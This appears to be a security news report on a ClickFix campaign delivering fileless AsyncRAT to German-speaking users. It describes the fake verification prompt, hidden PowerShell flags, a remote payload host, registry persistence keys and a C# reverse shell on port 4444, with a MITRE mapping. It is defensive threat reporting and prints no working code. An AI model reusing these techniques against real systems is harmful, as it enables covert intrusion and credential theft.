Fileless AsyncRAT Delivered by Hackers Through Fake Verification Prompt Using Clickfix Technique

Threat actors are distributing fileless AsyncRAT malware using a fake verification prompt delivered via the so-called “Clickfix” technique.

The campaign, which leverages advanced PowerShell obfuscation and in-memory C# loaders, has been actively targeting German-speaking users, exploiting social engineering and living-off-the-land binaries (LOLBins) to maximize stealth and persistence.

Technical Analysis

Researchers discovered a malicious Clickfix-themed website that lures victims with a seemingly harmless “I’m not a robot” prompt.

When users interact, a PowerShell-laden command is automatically copied to their clipboard and victims are instructed in German (“Drücke enter um deine identität zu bestätigen!”) to execute it in their terminal.

This command, concealed behind the legitimate-looking conhost.exe utility in headless mode, launches PowerShell with flags that suppress visibility (-w hidden -nop -c), and fetches a UTF-8 encoded payload from a remote server (namoet[.]de).

Once decoded and executed, the payload establishes multiple layers of persistence using Windows registry keys specifically, HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce and HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows.

This ensures continued execution at every login or system boot without dropping traditional files to disk, helping the threat evade endpoint protection mechanisms.

The core of the attack revolves around deeply obfuscated PowerShell and embedded C# code that is reversed, base64-encoded, and dynamically compiled at runtime via PowerShell’s Add-Type command.

According to CloudSEK Report, after reversing and decoding, this C# code acts as a .NET-based reverse shell.

Using TcpClient, it connects to the command-and-control server on TCP port 4444, handing attackers full remote access including command execution, keylogging, credential theft, and data exfiltration.

All communication and process management are performed in-memory, representing textbook fileless malware behavior.

Attribution and Threat Techniques

The technical indicators of this campaign point decisively to AsyncRAT, an established open-source Remote Access Trojan.

The use of obfuscated PowerShell, conhost.exe for stealth execution, registry-run persistence, in-memory C# compilation, and a persistent TCP connection to a C2 server closely mirror AsyncRAT’s known tradecraft.

Mitre ATT&CK technique mapping for this campaign includes:

• T1059.001: Execution via Command and Scripting Interpreter (PowerShell)
• T1105: Ingress Tool Transfer (remote payload download)
• T1027/T1027.002/T1140: Obfuscated and reversible in-memory payloads
• T1127.001: In-memory .NET compilation (“Compile After Delivery”)
• T1547.001: Registry Run Keys for persistence
• T1071.001/T1571: Application Layer Protocols/Non-Standard Port (TCP/4444)

The infrastructure analysis reveals multiple servers tied to the same campaign and suggests activity dating back to at least April 2025.

AsyncRAT’s fileless, memory-resident approach allows attackers to bypass conventional file-based antivirus and gain long-term, covert control of systems. Risks include data exfiltration, credential theft, and lateral network movement.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates